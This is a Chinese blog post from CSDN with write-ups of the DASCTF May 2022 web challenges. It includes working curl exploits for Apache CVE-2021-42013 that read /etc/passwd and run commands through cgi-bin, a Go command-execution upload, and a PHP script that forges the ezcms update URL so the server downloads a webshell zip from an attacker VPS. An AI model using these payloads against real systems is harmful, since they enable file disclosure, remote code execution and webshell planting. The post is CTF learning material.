2022DASCTF MAY web

最新推荐文章于 2024-04-21 23:52:53 发布
最新推荐文章于 2024-04-21 23:52:53 发布
阅读量459 收藏
点赞数
分类专栏: 比赛wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/125825435
版权

Power Cookie

开启环境后,我们发现了一个 login by GUEST

 我们对其进行抓包 根据提示:只有admin才可以获取flag

更改cookie为admin=1 得到flag

 魔法浏览器

在网站源码里,发现了一串 hex编码 对其解码

let ua = "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30 \x28\x57\x69\x6e\x64\x6f\x77\x73 \x4e\x54 \x31\x30\x2e\x30\x3b \x57\x69\x6e\x36\x34\x3b \x78\x36\x34\x29 \x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36 \x28\x4b\x48\x54\x4d\x4c\x2c \x6c\x69\x6b\x65 \x47\x65\x63\x6b\x6f\x29 \x4d\x61\x67\x69\x63\x2f\x31\x30\x30\x2e\x30\x2e\x34\x38\x39\x36\x2e\x37\x35";    
console["\x6c\x6f\x67"]
string="\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30 \x28\x57\x69\x6e\x64\x6f\x77\x73 \x4e\x54 \x31\x30\x2e\x30\x3b \x57\x69\x6e\x36\x34\x3b \x78\x36\x34\x29 \x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36 \x28\x4b\x48\x54\x4d\x4c\x2c \x6c\x69\x6b\x65 \x47\x65\x63\x6b\x6f\x29 \x4d\x61\x67\x69\x63\x2f\x31\x30\x30\x2e\x30\x2e\x34\x38\x39\x36\x2e\x37\x35"
#Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75
print(string)
#log
print("\x6c\x6f\x67")

 更改user-Agent 为 得到的浏览器

得到flag

getme

没有信息,源码里有一个:pwd:/usr/local/apache2/

 抓包后在返回包信息中得到 server版本为 Apache/2.4.50 (Unix)

搜索后可知是 CVE-2021-42013

参考:Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)

漏洞利用poc:

curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

查看任意文件:

 证明存在此漏洞。

目标服务器开启cgi或者cgid时候,可以命令执行

    curl -v --data "echo;命令" '目标地址:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

我们查看一下日志,看看有没有flag信息:

在日志中发现了flag的信息

 

 这个是假的flag,那么看看下面的那个fffffflalllallalagggggggggg

我们请求一下这个fffffflalllallalagggggggggg,得到flag

hackeme

知识点:golang、文件上传、rce

一道go的题目,对这方面不太了解,不过这道题还是比较简单的go

 可以点击,点进去 之后是一个list

挨个点击可以获得一些对应的文件和回显

whoami :"root<br>"

whereami:"/home/main<br>"

uptime:" 14:29:19 up 2 min, 0 users, load average: 11.68, 13.99, 13.58<br>"

flag:DASCTF{THIS_IS_FAKE_FLAG}<br>

但是users文件不存在

所有需要我们上传一个users.go文件,然后其执行,我们访问users,会返回文件执行结果

我们搜索一个执行命令的go文件

Go语言中用 os/exec 执行命令的五种姿势 - 知乎

/目录下执行 ls -l命令  发现了flag

更改users.go文件的命令,再上传 执行 cat /flag 得到flag

cmd := exec.Command("cat", "/flag")

ezcms

打开发现是一个漫城cmd,在url里加上/admin.php进入登陆窗口

 弱口令:用户名:admin 密码:123456

ezcms\sys\apps\controllers\admin目录下,注意其中的Update.php

在Update.php中,会去根据GET方式传的url,下载远程的zip包

然后将压缩包解压,将里面的文件放在我们能访问到的目录下,所以可以传一个木马


但是需要用到sys_auth函数的对我们传入的字符串进行解密为http://ip//a.zip这样的格式,然后才进行下载

这个sys_auth函数不能单独直接在本地使用,因为其中有个Mc_Encryption_Key全局变量

  跟进得到 Mc_Encryption_Key的值

//encryption_key密钥

define('Mc_Encryption_Key','GKwHuLj9AOhaxJ2');

最后直接赋值sys_auth函数作为加密构筑即可。

提前在vps放上a.zip,a.zip中放入我们的php一句话木马  密码为1vxyz

最终exp

<?php
//encryption_key密钥
define('Mc_Encryption_Key','GKwHuLj9AOhaxJ2');

//字符加密、解密
function sys_auth($string, $type = 0, $key = '', $expiry = 0) {
	if(is_array($string)) $string = json_encode($string);
	if($type == 1) $string = str_replace('-','+',$string);
	$ckey_length = 4;
	$key = md5($key ? $key : Mc_Encryption_Key);
	$keya = md5(substr($key, 0, 16));
	$keyb = md5(substr($key, 16, 16));
	$keyc = $ckey_length ? ($type == 1 ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
	$cryptkey = $keya.md5($keya.$keyc);
	$key_length = strlen($cryptkey);
	$string = $type == 1 ? base64_decode(substr($string, $ckey_length)) :  sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
	$string_length = strlen($string);
	$result = '';
	$box = range(0, 255);
	$rndkey = array();
	for($i = 0; $i <= 255; $i++) {
		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
	}
	for($j = $i = 0; $i < 256; $i++) {
		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
		$tmp = $box[$i];
		$box[$i] = $box[$j];
		$box[$j] = $tmp;
	}
	for($a = $j = $i = 0; $i < $string_length; $i++) {
		$a = ($a + 1) % 256;
		$j = ($j + $box[$a]) % 256;
		$tmp = $box[$a];
		$box[$a] = $box[$j];
		$box[$j] = $tmp;
		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
	} 
	if($type == 1) {
		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
			$result = substr($result, 26);
			$json = json_decode($result,1);
			if(!is_numeric($result) && $json){
				return $json;
			}else{
				return $result;
			}
		}
		return '';
	}
	return str_replace('+', '-', $keyc.str_replace('=', '', base64_encode($result)));
}

$url = "http://ip/123.zip";
echo(sys_auth($url));

之后生成的内容构筑访问update路由

http://5f1c9781-1871-4704-9f2f-0849aaf63a0b.node4.buuoj.cn:81/admin.php/update?url=c161kf-iJGQKAh8zQ4x8mh4-4nac-kgKhpwhj614UiYTKmre2zJKeCbneb4WN-lmlypF4SP0JUg

最后访问http://5f1c9781-1871-4704-9f2f-0849aaf63a0b.node4.buuoj.cn:81/a.php 

flag在根目录下 得到flag

参考:2022DASCTF May出题人挑战赛官方Write

2022DASCTF MAY 出题人挑战赛_Sk1y的博客-CSDN博客 

葫芦娃42
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lammps-4May2022.tar
07-20
lammps-4May2022.tar
CPHIMS Handbook May 2015_Web
12-14
CPHIMS Handbook May 2015_Web, HIMS指导手册,2015年版本。
2022DASCTF MAY 出题人挑战赛
as you know, nlp is fantasitc!
05-22 339
fxxkgo(复现) 原题参考 知识点:go语言的SSTI注入、jwt伪造 dockerfile目录里面的信息 main.go里面包含的包 思路:通过ssti拿到secret,然后伪造jwt Golang SSTI参考文章 ssti的利用点在 register 路由 注册{{.}}用户, {{.}}就是泄漏secret的payload auth 路由 \ 路由 用得到的secret伪造jwt flag路由拿到flag ...
2022DASCTF7月赋能赛(复现)
m0_62422842的博客
07-28 2513
DASCTF七月赋能赛的三个web题复现,涉及到sql注入,模板注入,php反序列化以及session文件包含
DASCTF 2024 第一场部分writeup
最新发布
qq_22607673的博客
04-21 306
如题
2022DASCTF MAY 出题人挑战赛个人Writeup
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
05-22 742
文章目录WEBPower Cookie魔法浏览器getmehackmefxxkgoMISC不懂PCB的厨师不是好黑客卡比神必流量 感觉这次难度还比较友好,一个人肝到第18,不过全是web和misc,密码再给点时间感觉也能出。 WEB Power Cookie 以游客身份登录,发现服务器返回了set-cookie 将set-cookie返回的值上送,并修改成管理员即可 Cookie: admin=1; Path=/; Domain=127.0.0.1; Max-Age=3600 魔法浏览器 查看源代码,
2022DASCTF MAY 出题人挑战赛 Writeup
末初的CSDN博客
05-23 963
2022DASCTF MAY 出题人挑战赛 Writeup
UL 60335-2-3-2022(May 10, 2022)Household and Similar
11-24
UL 60335-2-3-2022(May 10, 2022)Household and Similar
2022年优秀-超媒体与Web系统.pptx
11-15
在1945年,他在《大西洋月刊》上发表了文章《As We May Think》,进一步阐述了这一设想。他的目标是解决随着科学信息量快速增长而产生的检索难题,因为传统的线性检索方法已无法满足需求。 超链接是超文本和超媒体...
GeneFace中需要用到的May.zip
11-05
《GeneFace与May.zip在生物信息学中的应用详解》 在现代生物信息学领域,GeneFace是一个备受关注的工具,它主要用于基因识别和分析。在这个领域中,数据处理和分析的效率至关重要,而"May.zip"文件正是为GeneFace...
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_44047654的博客
12-07 718
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1383
发现对 Apache HTTP 服务器 2.4.50 中的 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
2021年漏洞小结-手工自检篇
weixin_48421613的博客
12-28 1358
声明: 此文章仅作为上篇文章工具检测后,进行手工验证或手工检测,该文章仅供于学习参考或企业自检,请勿用于非法用途。​请阅读文末声明 D-Link-DIR路由器 账号密码信息泄露漏洞 poc: /getcfg.php SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a 页面原型: 漏洞检测: 输入任意密码,而后点击登陆按钮,同时进行数据包拦截,修改数据包内容如下图 用户名以及密码就出来了​ 脚本参考如下: import requests url=inpu
2022DASCTF MAY
qq_62046696的博客
07-23 265
大佬们都在努力,我个小白也不能落下加油!!!
Apache HTTPd 2.4.49 CVE-2021-41773路径穿越
guishengyx的博客
10-19 127
vulfocus靶场
变色龙使用方法
热门推荐
客亦知夫水与月乎?
01-07 2万+
原文链接:http://wenku.baidu.com/view/3edeead0195f312b3169a5cd.html 使用方法: 1.变色龙的目录: 变色龙目录一般可放在MAC OS系统分区的根目录Extra,也就是/Extra a.在Extra目录下有Extensions(/Extra/Extensions) 这个目录其实它相当于MAC OS的/System/library/E
CVE-2021-42013-Apache HTTP Server 2.4.50路径穿越流量特征
12306小哥
10-10 1349
0x1 简介 Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.
shell 中的 ${} 、## 、%% 使用范例
weixin_30437481的博客
05-09 56
日常使用范例见如下例子: 利用 ${ } 还可针对不同的变数状态赋值 (沒设定、空值、非空值): ${file-my.file.txt} :假如 $file 沒有设定,則使用 my.file.txt 作传回值。(空值及非空值時不作处理) ${file:-my.file.txt} :假如 $file 沒有設定或為空值,則使用 my.file.txt 作傳回值。(非空值時不作处理)${file...
富士施乐 SC2022 维修手册
11-23
The manual provides comprehensive instructions on troubleshooting common issues that may arise with the SC2022, such as paper jams, print quality problems, connectivity issues, and error codes....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值